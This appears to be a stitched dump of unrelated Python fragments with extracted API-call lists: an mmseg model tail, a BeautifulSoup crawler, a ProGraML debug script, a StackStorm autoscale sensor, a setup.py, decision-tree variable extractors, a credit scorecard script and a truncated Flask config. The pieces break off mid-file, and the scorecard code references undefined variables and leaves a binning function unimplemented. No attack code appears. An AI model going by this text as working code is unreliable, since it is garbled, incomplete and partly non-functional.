if mode and self.norm_eval:
for m in self.modules():
if isinstance(m, _BatchNorm):
m.eval()
| [
"torch.nn.Sigmoid",
"math.ceil",
"mmseg.utils.get_root_logger",
"mmcv.cnn.ConvModule",
"mmcv.cnn.normal_init",
"torch.matmul",
"mmseg.models.utils.PSPModule",
"torch.nn.functional.interpolate",
"torch.nn.AdaptiveAvgPool2d",
"mmcv.runner.load_checkpoint",
"mmseg.models.utils.LocalAttentionModule"... | [((3264, 3295), 'math.ceil', 'math.ceil', (['(out_channels / ratio)'], {}), '(out_channels / ratio)\n', (3273, 3295), False, 'import math\n'), ((4170, 4196), 'torch.cat', 'torch.cat', (['[x1, x2]'], {'dim': '(1)'}), '([x1, x2], dim=1)\n', (4179, 4196), False, 'import torch\n'), ((5694, 5718), 'torch.matmul', 'torch.matmul', (['query', 'key'], {}), '(query, key)\n', (5706, 5718), False, 'import torch\n'), ((5793, 5819), 'torch.nn.functional.softmax', 'F.softmax', (['sim_map'], {'dim': '(-1)'}), '(sim_map, dim=-1)\n', (5802, 5819), True, 'import torch.nn.functional as F\n'), ((5839, 5867), 'torch.matmul', 'torch.matmul', (['sim_map', 'value'], {}), '(sim_map, value)\n', (5851, 5867), False, 'import torch\n'), ((9718, 9786), 'torch.nn.functional.interpolate', 'F.interpolate', (['fcp'], {'size': '(h, w)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(fcp, size=(h, w), mode='bilinear', align_corners=True)\n", (9731, 9786), True, 'import torch.nn.functional as F\n'), ((9800, 9828), 'torch.cat', 'torch.cat', (['[fsp, fcp]'], {'dim': '(1)'}), '([fsp, fcp], dim=1)\n', (9809, 9828), False, 'import torch\n'), ((5209, 5228), 'mmseg.models.utils.PSPModule', 'PSPModule', (['psp_size'], {}), '(psp_size)\n', (5218, 5228), False, 'from mmseg.models.utils import LocalAttentionModule, PSPModule\n'), ((5398, 5417), 'mmseg.models.utils.PSPModule', 'PSPModule', (['psp_size'], {}), '(psp_size)\n', (5407, 5417), False, 'from mmseg.models.utils import LocalAttentionModule, PSPModule\n'), ((6871, 6962), 'mmseg.models.utils.LocalAttentionModule', 'LocalAttentionModule', ([], {'num_channels': '(576)', 'conv_cfg': 'self.conv_cfg', 'norm_cfg': 'self.norm_cfg'}), '(num_channels=576, conv_cfg=self.conv_cfg, norm_cfg=\n self.norm_cfg)\n', (6891, 6962), False, 'from mmseg.models.utils import LocalAttentionModule, PSPModule\n'), ((8581, 8609), 'torch.nn.AdaptiveAvgPool2d', 'nn.AdaptiveAvgPool2d', (['(1, 1)'], {}), '((1, 1))\n', (8601, 8609), True, 'import torch.nn as nn\n'), ((8968, 9154), 'mmcv.cnn.ConvModule', 'ConvModule', ([], {'in_channels': '(self.out_channels // 4)', 'out_channels': 'self.out_channels', 'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'conv_cfg': 'self.conv_cfg', 'norm_cfg': 'self.norm_cfg', 'act_cfg': 'None'}), '(in_channels=self.out_channels // 4, out_channels=self.\n out_channels, kernel_size=1, stride=1, padding=0, conv_cfg=self.\n conv_cfg, norm_cfg=self.norm_cfg, act_cfg=None)\n', (8978, 9154), False, 'from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init\n'), ((9300, 9312), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (9310, 9312), True, 'import torch.nn as nn\n'), ((11462, 11479), 'mmseg.utils.get_root_logger', 'get_root_logger', ([], {}), '()\n', (11477, 11479), False, 'from mmseg.utils import get_root_logger\n'), ((11492, 11554), 'mmcv.runner.load_checkpoint', 'load_checkpoint', (['self', 'pretrained'], {'strict': '(False)', 'logger': 'logger'}), '(self, pretrained, strict=False, logger=logger)\n', (11507, 11554), False, 'from mmcv.runner import load_checkpoint\n'), ((11690, 11715), 'mmcv.cnn.normal_init', 'normal_init', (['m'], {'std': '(0.001)'}), '(m, std=0.001)\n', (11701, 11715), False, 'from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init\n'), ((11784, 11803), 'mmcv.cnn.constant_init', 'constant_init', (['m', '(1)'], {}), '(m, 1)\n', (11797, 11803), False, 'from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init\n')] |
import pandas as pd
import re
import requests
from bs4 import BeautifulSoup
from time import sleep
from .requester import Requester
class Crawler:
"""
"""
def __init__(self, url, sarcasm, as_archived=False):
self.__url = url
self.__sarcasm = sarcasm
self.__as_archived = as_archived
self.__data = list()
self.__requests = list()
def set_requests(self, html_class, regex, remove, element="a", shorter=0):
""" NOT UPDATED YET
Find the last page of a website.
e.g. "Pages 1, 2, ..., 34, 35" <- Last page here is 35;
Or find the strings rellated to the archived data.
e.g. "News by year: 2020, 2019, ...,2005" <- Here is a list[2020, ..., 2005].
In both cases it'll depend if the __as_archived variable is True or False.
Parameters
----------
html_class : str
Class of the a href attribute related to the maximum number.
re_string : raw str
Regular expression to find the last page refer.
rm_start : int
How much to exclude from the beginning of the substring founded by the RE.
rm_end : int
How much to exclude from the end of the substring founded by the RE.
element: str, default "a"
Element of the HTML to be founded.
shorter: int, default 0
If it's archived style page, set how much to remove from the url to get the
pages url list. If necessary.
"""
find_pages = re.compile(regex)
urls = list()
html = Requester.get_one_request(self.__url + ("1", "")[self.__as_archived], force=True)
bs = BeautifulSoup(html.text, "html.parser")
element = str(bs.find_all(element, class_=html_class))
if self.__as_archived == True:
for page in find_pages.finditer(element):
urls.append(str(self.__url[:-shorter]) + element[page.start()+remove[0]:page.end()-remove[1]])
else:
for page in find_pages.finditer(element):
pages = int(element[page.start()+remove[0]:page.end()-remove[1]]) + 1
for page in range(1, pages):
urls.append(self.__url + str(page))
self.__requests = Requester(urls, num_threads=24).get_requests()
def get_raw_data(self, html_class, regex, element="div"):
""" NOT UPDATED YET
Find some specific part of an HTML class.
Parameters
----------
html_class : str
Class of the a specified element.
re_element : str
Regular expression to find a specific HTML element.
element : str, default "div"
Element of the HTML to be founded.
"""
find_element = re.compile(regex)
raw_data = list()
for request in self.__requests:
bs = BeautifulSoup(request.text, "html.parser")
raw = str(bs.find_all(element, class_=html_class))
for text in find_element.finditer(raw):
raw_data.append(raw[text.start():text.end()])
print("[+] Total of {0:04d} raw data collected".format(len(raw_data)))
return raw_data
def set_data(self, raw_args, regex, remove, html_options, url_prefix=0):
""" NOT UPDATED YET
Find a specific data of links and title information from a list of
HTML specific data.
Parameters
----------
re_link : str
Regular expression to find a href HTML element.
re_title : str
Regular expression to find a title HTML element.
rm_start : tuple, (int,int)
How much to exclude from the beginning of two substrings founded by the
two regular expressions: re_link and re_title, in that order.
rm_end : tuple, (int,int)
How much to exclude from the end of two substrings founded by the two
regular expressions: re_link and re_title, in that order.
url : str, default ""
A substring to add in the beginning of the link founded by the re_link;
It's only used if the website URL is different from the original used in
the crawling.
url_prefix int, default 0
If there's anything to add in the begging of the url string to change in
the columns of "link" in the dataset.
"""
find_link = re.compile(regex[0])
find_title = re.compile(regex[1])
find_text = re.compile(r"<.*?>")
# find_text = re.compile(r"<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});")
urls = list()
for raw in self.get_raw_data(**raw_args):
data = [None,None,None,None]
data[0] = self.__sarcasm
for tmp in find_link.finditer(raw):
data[1] = self.__url[:url_prefix] + raw[tmp.start()+remove[0][0]:tmp.end()-remove[0][1]]
urls.append(data[1])
for tmp in find_title.finditer(raw):
data[2] = raw[tmp.start()+remove[1][0]:tmp.end()-remove[1][1]]
if data[2] == [""]:
continue
data[3] = ""
self.__data.append(data)
# progress = 0
# requests = Requester(urls, num_threads = 64).get_requests()
# print("[+] {0:03d}/{1:03d} data crawled".format(progress,len(requests)), end='\r')
# for request in requests:
# if request.url != urls[progress]:
# progress += 1
# continue
# bs = BeautifulSoup(request.text, "html.parser")
# text = str(bs.find_all(html_options[0], html_options[1]))
# bs = BeautifulSoup(text, "html.parser")
# text = str(bs.find_all("p"))
# indexs = list()
# for t in find_text.finditer(text):
# indexs.append([t.start(),t.end()])
# indexs.reverse()
# text = list(text)
# for i in indexs:
# for r in range(i[1], i[0]-1, -1):
# text[r] = ''
# self.__data[progress][3] = ''.join(text)
# progress += 1
# print("[+] {0:03d}/{1:03d} data crawled".format(progress,len(requests)), end='\r')
# print()
print("[+] Dataframe completed")
def get_data(self):
return self.__data | [
"bs4.BeautifulSoup",
"re.compile"
] | [((1341, 1358), 're.compile', 're.compile', (['regex'], {}), '(regex)\n', (1351, 1358), False, 'import re\n'), ((1474, 1513), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html.text', '"""html.parser"""'], {}), "(html.text, 'html.parser')\n", (1487, 1513), False, 'from bs4 import BeautifulSoup\n'), ((2391, 2408), 're.compile', 're.compile', (['regex'], {}), '(regex)\n', (2401, 2408), False, 'import re\n'), ((3794, 3814), 're.compile', 're.compile', (['regex[0]'], {}), '(regex[0])\n', (3804, 3814), False, 'import re\n'), ((3830, 3850), 're.compile', 're.compile', (['regex[1]'], {}), '(regex[1])\n', (3840, 3850), False, 'import re\n'), ((3865, 3884), 're.compile', 're.compile', (['"""<.*?>"""'], {}), "('<.*?>')\n", (3875, 3884), False, 'import re\n'), ((2472, 2514), 'bs4.BeautifulSoup', 'BeautifulSoup', (['request.text', '"""html.parser"""'], {}), "(request.text, 'html.parser')\n", (2485, 2514), False, 'from bs4 import BeautifulSoup\n')] |
from pathlib import Path
import pickle
import time, os, json, sys
import numpy as np
#from matplotlib import pyplot as plt
import networkx as nx
#import tqdm
#import torch
#from torch_geometric.data import Data, DataLoader, InMemoryDataset
#import torch_geometric
# make this file executable from anywhere
#if __name__ == '__main__':
full_path = os.path.realpath(__file__)
print(full_path)
repo_root = full_path.rsplit('ProGraML', maxsplit=1)[0] + 'ProGraML'
print(repo_root)
#insert at 1, 0 is the script path (or '' in REPL)
sys.path.insert(1, repo_root)
repo_root = Path(repo_root)
from deeplearning.ml4pl.graphs.unlabelled.llvm2graph import graph_builder
builder = graph_builder.ProGraMLGraphBuilder() #opt='/usr/bin/opt')
builder7 = graph_builder.ProGraMLGraphBuilder(opt='/usr/bin/opt')
file_to_debug = '/mnt/data/llvm/master_thesis_datasets/unsupervised_ncc_data/amd_app_sdk/amd/AtomicCounters.ll'
#with open('/mnt/data/llvm/master_thesis_datasets/unsupervised_ncc_data/amd_app_sdk/amd_ocl/AMDAPPSDK-3.0_samples_bolt_BoxFilterSAT_BoxFilterSAT_Kernels.ll', 'r') as f:
#with open('/mnt/data/llvm/master_thesis_datasets/unsupervised_ncc_data/eigen/eigen_matmul_3/eigen_matmul-266.ll_', 'r') as f:
#with open(repo_root / 'deeplearning/ml4pl/poj104' / '71.ll', 'r') as f:
with open(file_to_debug, 'r') as f:
ll = f.read()
nx_graph = builder.Build(ll)
nx_graph7 = builder7.Build(ll)
for i in range(5):
nn = builder.Build(ll)
print(f"====== {i} =====")
for n, d in nn.nodes.items():
print(n, d)
if 15 >= n and n > 14:
pass
print('\n\n\n\n')
di = []
ddi = []
for n, d in nn.nodes.items():
match = None
is_ok = False
for nn, dd in nx_graph.nodes.items():
if d == dd:
#if is_ok:
# assert False, f'double match: {match}, double: {nn, dd}'
is_ok = True
match = [n, d, nn, dd]
assert is_ok, f"is not okay! {n} and data {d}"
print('done')
| [
"os.path.realpath",
"sys.path.insert",
"deeplearning.ml4pl.graphs.unlabelled.llvm2graph.graph_builder.ProGraMLGraphBuilder",
"pathlib.Path"
] | [((351, 377), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (367, 377), False, 'import time, os, json, sys\n'), ((532, 561), 'sys.path.insert', 'sys.path.insert', (['(1)', 'repo_root'], {}), '(1, repo_root)\n', (547, 561), False, 'import time, os, json, sys\n'), ((574, 589), 'pathlib.Path', 'Path', (['repo_root'], {}), '(repo_root)\n', (578, 589), False, 'from pathlib import Path\n'), ((677, 713), 'deeplearning.ml4pl.graphs.unlabelled.llvm2graph.graph_builder.ProGraMLGraphBuilder', 'graph_builder.ProGraMLGraphBuilder', ([], {}), '()\n', (711, 713), False, 'from deeplearning.ml4pl.graphs.unlabelled.llvm2graph import graph_builder\n'), ((746, 800), 'deeplearning.ml4pl.graphs.unlabelled.llvm2graph.graph_builder.ProGraMLGraphBuilder', 'graph_builder.ProGraMLGraphBuilder', ([], {'opt': '"""/usr/bin/opt"""'}), "(opt='/usr/bin/opt')\n", (780, 800), False, 'from deeplearning.ml4pl.graphs.unlabelled.llvm2graph import graph_builder\n')] |
import time
import eventlet
import ast
from st2reactor.sensor.base import PollingSensor
__all_ = [
'AutoscaleGovernorSensor'
]
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
GROUP_ACTIVE_STATUS = [
'expanding',
'deflating'
]
class AutoscaleGovernorSensor(PollingSensor):
def __init__(self, sensor_service, config=None, poll_interval=60):
super(AutoscaleGovernorSensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._logger = self._sensor_service.get_logger(__name__)
self._kvp_get = self._sensor_service.get_value
self._trigger = {
'expand': 'autoscale.ScaleUpPulse',
'deflate': 'autoscale.ScaleDownPulse'
}
self._bound = {
'expand': 'max',
'deflate': 'min'
}
def setup(self):
pass
def poll(self):
alerting_asgs = []
stable_asgs = []
# Get all the ASG related keys in the Key Store
kvps = self._sensor_service.list_values(local=False, prefix='asg.')
# Sort out which Applications are actively alerting, and which are not.
for kvp in kvps:
if 'active_incident' in kvp.name:
asg_data = kvp.name.split('.')
asg = asg_data[1]
if ast.literal_eval(kvp.value):
alerting_asgs.append(asg)
else:
stable_asgs.append(asg)
# Attempt to determine if an ASG needs to scale up...
for asg in alerting_asgs:
self._process_asg(asg, 'expand')
# ... or down
for asg in stable_asgs:
self._process_asg(asg, 'deflate')
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _process_asg(self, asg, action):
trigger_type = self._trigger[action]
bound = self._bound[action]
group_status = self._kvp_get('asg.%s.status' % (asg), local=False)
last_event_timestamp = self._kvp_get('asg.%s.last_%s_timestamp' % (asg, action), local=False)
event_delay = self._kvp_get('asg.%s.%s_delay' % (asg, action), local=False)
current_node_count = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
node_bound = self._kvp_get('asg.%s.%s_nodes' % (asg, bound), local=False)
total_nodes = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
if group_status in GROUP_ACTIVE_STATUS:
self._logger.info("AutoScaleGovernor: Autoscale group is currently %s. Skipping..." %
(group_status))
return
# ensure we have all the required variables
if last_event_timestamp and event_delay and current_node_count and node_bound and total_nodes:
# See if an ASG is even eligible to be acted upon, min or max.
bound_check = getattr(self, '_%s_bound_check' % bound)(int(node_bound), int(total_nodes))
delay_check = self._event_delay_check(int(last_event_timestamp), int(event_delay))
if bound_check and delay_check:
self._dispatch_trigger(trigger_type, asg)
else:
self._logger.info("AutoScaleGovernor: Not all K/V pairs exist for ASG %s. Skipping..." % asg)
def _event_delay_check(self, last_event_timestamp, event_delay):
check = True if last_event_timestamp + (event_delay * 60) < int(time.time()) else False
return check
def _max_bound_check(self, max_nodes, total_nodes):
"""
Make sure we have not reached the threshold and are not above max_nodes.
We only want to send scale up pulse if we are not above max_nodes threshold.
"""
check = True if total_nodes < max_nodes else False
return check
def _min_bound_check(self, min_nodes, total_nodes):
"""
Make sure we have not reached the min_nodes threshold.
We only want to scale down if current number of nodes is greater than min_nodes.
"""
check = True if total_nodes > min_nodes else False
return check
def _dispatch_trigger(self, trigger, asg):
payload = {
'asg': asg,
}
self._sensor_service.dispatch(trigger=trigger, payload=payload)
| [
"ast.literal_eval",
"time.time",
"eventlet.monkey_patch"
] | [((133, 218), 'eventlet.monkey_patch', 'eventlet.monkey_patch', ([], {'os': '(True)', 'select': '(True)', 'socket': '(True)', 'thread': '(True)', 'time': '(True)'}), '(os=True, select=True, socket=True, thread=True, time=True\n )\n', (154, 218), False, 'import eventlet\n'), ((1490, 1517), 'ast.literal_eval', 'ast.literal_eval', (['kvp.value'], {}), '(kvp.value)\n', (1506, 1517), False, 'import ast\n'), ((3764, 3775), 'time.time', 'time.time', ([], {}), '()\n', (3773, 3775), False, 'import time\n')] |
#!/usr/bin/env python
# Author: <NAME>
# email: <EMAIL>
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open(('README.md'), encoding='utf-8') as readme:
bdescription = readme.read()
setup(
name='sparkdataset',
description=("Provides instant access to many popular datasets right from "
"Pyspark (in dataframe structure)."),
author='<NAME>',
url='https://github.com/Spratiher9/SparkDataset',
download_url='https://github.com/Spratiher9/SparkDataset/archive/refs/tags/1.0.0.tar.gz',
license = 'MIT',
author_email='<EMAIL>',
version='1.0.0',
long_description=bdescription,
long_description_content_type='text/markdown',
keywords=['Spark', 'Apache Spark', 'benchmarking', 'data', 'datasets', 'standard data'],
install_requires=['pandas','pyspark==3.1.2'],
packages=['sparkdataset', 'sparkdataset.utils'],
package_data={'sparkdataset': ['*.gz', 'resources.tar.gz']},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.10'
]
) | [
"distutils.core.setup"
] | [((243, 1188), 'distutils.core.setup', 'setup', ([], {'name': '"""sparkdataset"""', 'description': '"""Provides instant access to many popular datasets right from Pyspark (in dataframe structure)."""', 'author': '"""<NAME>"""', 'url': '"""https://github.com/Spratiher9/SparkDataset"""', 'download_url': '"""https://github.com/Spratiher9/SparkDataset/archive/refs/tags/1.0.0.tar.gz"""', 'license': '"""MIT"""', 'author_email': '"""<EMAIL>"""', 'version': '"""1.0.0"""', 'long_description': 'bdescription', 'long_description_content_type': '"""text/markdown"""', 'keywords': "['Spark', 'Apache Spark', 'benchmarking', 'data', 'datasets', 'standard data']", 'install_requires': "['pandas', 'pyspark==3.1.2']", 'packages': "['sparkdataset', 'sparkdataset.utils']", 'package_data': "{'sparkdataset': ['*.gz', 'resources.tar.gz']}", 'classifiers': "['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers', 'Topic :: Software Development',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.10']"}), "(name='sparkdataset', description=\n 'Provides instant access to many popular datasets right from Pyspark (in dataframe structure).'\n , author='<NAME>', url='https://github.com/Spratiher9/SparkDataset',\n download_url=\n 'https://github.com/Spratiher9/SparkDataset/archive/refs/tags/1.0.0.tar.gz'\n , license='MIT', author_email='<EMAIL>', version='1.0.0',\n long_description=bdescription, long_description_content_type=\n 'text/markdown', keywords=['Spark', 'Apache Spark', 'benchmarking',\n 'data', 'datasets', 'standard data'], install_requires=['pandas',\n 'pyspark==3.1.2'], packages=['sparkdataset', 'sparkdataset.utils'],\n package_data={'sparkdataset': ['*.gz', 'resources.tar.gz']},\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers', 'Topic :: Software Development',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.10'])\n", (248, 1188), False, 'from distutils.core import setup\n')] |
#!/usr/bin/python
import json
import sys
import csv
import math
def VarInBranchLimited(tree, uvars, writer, limit):
"""Return all variables in a branch with limit (list)"""
# Check if the numSplit drop below limit or if it raches a lastSplit node
if ((len(uvars)+tree['Weigth']) <= limit) or (tree['LastSplit'] == True) :
vars = uvars[:] + VarInTree(tree)
vars = list(dict.fromkeys(vars))
writer.writerow(vars)
del vars
else:
vars = uvars[:] + [tree['splitVar']]
if 'splitVar' in tree['left']:
VarInBranchLimited(tree['left'], vars, writer, limit)
if 'splitVar' in tree['right']:
VarInBranchLimited(tree['right'], vars, writer, limit)
del vars
return
def AddWeigthTree(tree):
"""Add weigth to nodes of a tree (for branch with limit)"""
if 'splitVar' in tree:
if 'left' in tree:
wl = AddWeigthTree(tree['left'])
if 'right' in tree:
wr = AddWeigthTree(tree['right'])
tree['Weigth'] = wl + wr + 1
else:
tree['Weigth'] = 0
if tree['Weigth'] == 1 :
tree['LastSplit'] = True
else:
tree['LastSplit'] = False
return tree['Weigth']
def VarPerBranchLimited(trees, ofn, limit):
"""Save variables per branch with limit in a line (remove duplicate and comma seprated)"""
with open(ofn,'w') as csvfile:
writer = csv.writer(csvfile)
for i, tree in enumerate(trees):
if 'splitVar' in tree['rootNode']:
vars = list()
vars.append(i)
tree['Weigth'] = AddWeigthTree(tree['rootNode'])
VarInBranchLimited(tree['rootNode'], vars, writer, limit)
def VarInBranch(tree, uvars, writer):
"""Return all variables in a branch (list)"""
vars = uvars[:] + [tree['splitVar']]
intermediate = False
if 'splitVar' in tree['left']:
VarInBranch(tree['left'], vars, writer)
intermediate = True
if 'splitVar' in tree['right']:
VarInBranch(tree['right'], vars, writer)
intermediate = True
if intermediate == False:
#vars = list(dict.fromkeys(vars))
writer.writerow(vars)
del vars
return
def VarPerBranche(trees, ofn):
"""Save variables per branch in a line (remove duplicate and comma seprated)"""
with open(ofn,'w') as csvfile:
writer = csv.writer(csvfile)
for i, tree in enumerate(trees):
if 'splitVar' in tree['rootNode']:
vars = list()
vars.append(i)
VarInBranch(tree['rootNode'], vars, writer)
del vars
def VarInTree(tree):
"""Return all variables in a tree (list)"""
vars = list()
if 'splitVar' in tree:
vars += [tree['splitVar']]
if 'left' in tree:
vars += VarInTree(tree['left'])
if 'right' in tree:
vars += VarInTree(tree['right'])
return vars
def VarPerTree(trees, ofn):
"""Save variables per tree in a line (remove duplicate and comma seprated)"""
with open(ofn,'w') as csvfile:
writer = csv.writer(csvfile)
for tree in trees:
treeVars = VarInTree(tree['rootNode'])
treeVars = list(dict.fromkeys(treeVars))
writer.writerow(treeVars)
def VarInForest(trees, ofn):
"""Save all variables in the forest (remove duplicate and comma seprated)"""
forestVars = list()
for tree in trees:
treeVars = VarInTree(tree['rootNode'])
forestVars += treeVars
forestVars = list(dict.fromkeys(forestVars))
with open(ofn,'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(forestVars)
def ListRoots(trees, ofn):
"""Save roots one per line"""
with open(ofn,'w') as csvfile:
writer = csv.writer(csvfile)
for tree in trees:
if 'rootNode' in tree and 'splitVar' in tree['rootNode']:
r = list()
r.append(tree['rootNode']['splitVar'])
writer.writerow(r)
def Choose(n,r):
"""Computes n! / (r! (n-r)!) exactly. Returns a python long int."""
assert n >= 0
assert 0 <= r <= n
c = 1
denom = 1
for (num,denom) in zip(range(n,n-r,-1), range(1,r+1,1)):
c = (c * num) // denom
return c
def NumComb(ifn, order, isFirstColIndex=False):
with open(ifn) as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
numComb=0
for row in readCSV:
numVar = len(row)
if(isFirstColIndex):
numVar -= 1
if numVar >= order:
numComb += Choose(numVar,order)
return numComb
if __name__ == '__main__':
argc = len(sys.argv)
if(argc < 3):
print("Enter a command and path to the inptu file")
exit()
command = sys.argv[1]
inputFile = sys.argv[2]
if(argc > 3):
outputFile = sys.argv[3]
thr = -1
if(argc > 4):
thr = int(sys.argv[4])
if(command != "comb" and command != "combx"):
with open(inputFile, 'r') as json_file:
full_data = json.load(json_file)
if(command=="forest"):
VarInForest(full_data['trees'], outputFile)
if(command=="tree"):
VarPerTree(full_data['trees'], outputFile)
if(command=="branch"):
VarPerBranche(full_data['trees'], outputFile)
if(command=="limit"):
if(thr==-1):
print("pleas enter limit (4th argument)")
exit()
VarPerBranchLimited(full_data['trees'], outputFile, thr)
if(command=="roots"):
ListRoots(full_data['trees'], outputFile)
if(command=="comb" or command=="combx"):
if(argc < 4):
print("pleas enter order")
exit()
order = int(outputFile) # There is no output file
excludeFirstCol=False
if(command=="combx"):
excludeFirstCol=True
print(NumComb(inputFile, order, isFirstColIndex=excludeFirstCol))
| [
"json.load",
"csv.writer",
"csv.reader"
] | [((1424, 1443), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (1434, 1443), False, 'import csv\n'), ((2423, 2442), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (2433, 2442), False, 'import csv\n'), ((3150, 3169), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (3160, 3169), False, 'import csv\n'), ((3681, 3700), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (3691, 3700), False, 'import csv\n'), ((3851, 3870), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (3861, 3870), False, 'import csv\n'), ((4427, 4461), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (4437, 4461), False, 'import csv\n'), ((5140, 5160), 'json.load', 'json.load', (['json_file'], {}), '(json_file)\n', (5149, 5160), False, 'import json\n')] |
'''
makeRankingCard.py:制作评分卡。
Author: HeRaNO
'''
import sys
import imblearn
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression as LR
# Read data start
model = pd.read_csv("model_data.csv", index_col = 0)
vali = pd.read_csv("vali_data.csv", index_col = 0)
# Read data end
# Start binning
def calcWOE(num_bins):
columns = ["min", "max", "count_0", "count_1"]
df = pd.DataFrame(num_bins, columns = columns)
df["total"] = df.count_0 + df.count_1
df["percentage"] = df.total / df.total.sum()
df["bad_rate"] = df.count_1 / df.total
df["goodpercent"] = df.count_0 / df.count_0.sum()
df["badpercent"] = df.count_1 / df.count_1.sum()
df["woe"] = np.log(df["goodpercent"] / df["badpercent"])
return df
def calcIV(df):
rate = df["goodpercent"] - df["badpercent"]
iv = np.sum(rate * df.woe)
return iv
def bestBin(DF, X, Y, n, q):
pass
'''
自己写吧我写崩溃了
大概的取值:
RevolvingUtilizationOfUnsecuredLines:8
age:11
DebtRatio:11
MonthlyIncome:9
NumberOfOpenCreditLinesAndLoans:6
其余均无法分箱,需要手动分
'''
# 分箱应该得到一个 bins_of_col[] 数组,里面是分箱的分段点
# Binning end
# Modeling start
model_woe = pd.DataFrame(index = model_data.index)
for col in bins_of_col:
model_woe[col] = pd.cut(model_data[col],bins_of_col[col]).map(woeall[col])
model_woe["SeriousDlqin2yrs"] = model_data["SeriousDlqin2yrs"]
vali_woe = pd.DataFrame(index = vali_data.index)
for col in bins_of_col:
vali_woe[col] = pd.cut(vali_data[col],bins_of_col[col]).map(woeall[col])
vali_woe["SeriousDlqin2yrs"] = vali_data["SeriousDlqin2yrs"]
vali_X = vali_woe.iloc[:,:-1]
vali_y = vali_woe.iloc[:,-1]
X = model_woe.iloc[:,:-1]
y = model_woe.iloc[:,-1]
lr = LR().fit(X, y)
lr.score(vali_X, vali_y)
# Modeling end
# Make card start
B = 20 / np.log(2)
A = 600 + B * np.log(1 / 60)
with open("score.csv", "w") as fdata:
fdata.write("base_score,{}\n".format(base_score))
for i, col in enumerate(X.columns):
score = woeall[col] * (-B * lr.coef_[0][i])
score.name = "Score"
score.index.name = col
score.to_csv(file, header = True, mode = "a")
# Make card end
| [
"pandas.read_csv",
"numpy.log",
"pandas.cut",
"sklearn.linear_model.LogisticRegression",
"numpy.sum",
"pandas.DataFrame"
] | [((204, 246), 'pandas.read_csv', 'pd.read_csv', (['"""model_data.csv"""'], {'index_col': '(0)'}), "('model_data.csv', index_col=0)\n", (215, 246), True, 'import pandas as pd\n'), ((256, 297), 'pandas.read_csv', 'pd.read_csv', (['"""vali_data.csv"""'], {'index_col': '(0)'}), "('vali_data.csv', index_col=0)\n", (267, 297), True, 'import pandas as pd\n'), ((1137, 1173), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'model_data.index'}), '(index=model_data.index)\n', (1149, 1173), True, 'import pandas as pd\n'), ((1352, 1387), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'vali_data.index'}), '(index=vali_data.index)\n', (1364, 1387), True, 'import pandas as pd\n'), ((411, 450), 'pandas.DataFrame', 'pd.DataFrame', (['num_bins'], {'columns': 'columns'}), '(num_bins, columns=columns)\n', (423, 450), True, 'import pandas as pd\n'), ((693, 737), 'numpy.log', 'np.log', (["(df['goodpercent'] / df['badpercent'])"], {}), "(df['goodpercent'] / df['badpercent'])\n", (699, 737), True, 'import numpy as np\n'), ((817, 838), 'numpy.sum', 'np.sum', (['(rate * df.woe)'], {}), '(rate * df.woe)\n', (823, 838), True, 'import numpy as np\n'), ((1753, 1762), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1759, 1762), True, 'import numpy as np\n'), ((1668, 1672), 'sklearn.linear_model.LogisticRegression', 'LR', ([], {}), '()\n', (1670, 1672), True, 'from sklearn.linear_model import LogisticRegression as LR\n'), ((1777, 1791), 'numpy.log', 'np.log', (['(1 / 60)'], {}), '(1 / 60)\n', (1783, 1791), True, 'import numpy as np\n'), ((1218, 1259), 'pandas.cut', 'pd.cut', (['model_data[col]', 'bins_of_col[col]'], {}), '(model_data[col], bins_of_col[col])\n', (1224, 1259), True, 'import pandas as pd\n'), ((1431, 1471), 'pandas.cut', 'pd.cut', (['vali_data[col]', 'bins_of_col[col]'], {}), '(vali_data[col], bins_of_col[col])\n', (1437, 1471), True, 'import pandas as pd\n')] |
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from redis import StrictRedis
from flask_wtf.csrf import CSRFProtect, generate_csrf
from flask_session import Session
from config import config_dict
# 暂时没有app对象,就不会去初始化,只是声明一下.为什么能这样做:点进去源码
# 没有就申明一下 有就进入判断去执行 (懒加载思想)
db = SQLAlchemy()
# redis_store没有像SQLAlchemy封装一个这样到方法 就直接设置为全局变量
redis_store = None # type: StrictRedis
"""记录日志的配置"""
def setup_log(config_name):
# 下面到函数调用后 根据传入的参数 找不到不同的项目配置类
